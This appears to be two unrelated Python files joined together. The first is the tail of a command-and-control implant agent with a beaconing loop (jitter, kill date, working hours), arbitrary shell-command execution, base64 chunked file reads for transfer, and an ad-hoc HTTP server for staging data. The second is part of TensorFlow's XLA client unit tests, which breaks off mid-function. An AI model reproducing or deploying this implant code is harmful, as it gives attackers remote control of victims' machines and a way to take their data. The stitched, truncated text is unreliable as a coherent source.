result = build_response_packet(110, str(dataStats_2))
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p)
process_job_tasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" %(e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(data)
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
def directory_listing(path):
# directory listings in python
# https://www.opentechguides.com/how-to/article/python/78/directory-file-list.html
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(fn):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr,user,group,mtime,fsize,unit,fn)
return res
# additional implementation methods
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
elif re.compile("hostname").match(command):
return str(socket.gethostname())
else:
if cmdargs != None:
command = "{} {}".format(command,cmdargs)
p = subprocess.Popen(command, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return p.communicate()[0].strip().decode('UTF-8')
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
################################################
#
# main agent functionality
#
################################################
while(True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start,end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
pass
if now >= killDateTime:
msg = "[!] Agent %s exiting" %(sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
# exit if we miss commnicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1,jitter)
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data.strip() == defaultResponse.strip():
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
import unittest
class LocalComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.ExecuteWithPythonValues(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None, rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationsWithConstantsTest(LocalComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testGetProto(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
built = c.Build()
proto = built.GetProto() # HloModuleProto
self.assertTrue(len(proto.computations) == 1)
self.assertTrue(len(proto.computations[0].instructions) == 3)
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_cpu_custom_call_target(name, fn)
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(np.float32, (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.float32, (), ()),
xla_client.Shape.array_shape(np.float32, (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(LocalComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(LocalComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.LocalBuffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2,))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
class SingleOpTest(LocalComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.xla_data_pb2.S32,
np.float32: xla_client.xla_data_pb2.F32,
}
xla_x64_types = {
np.int64: xla_client.xla_data_pb2.S64,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
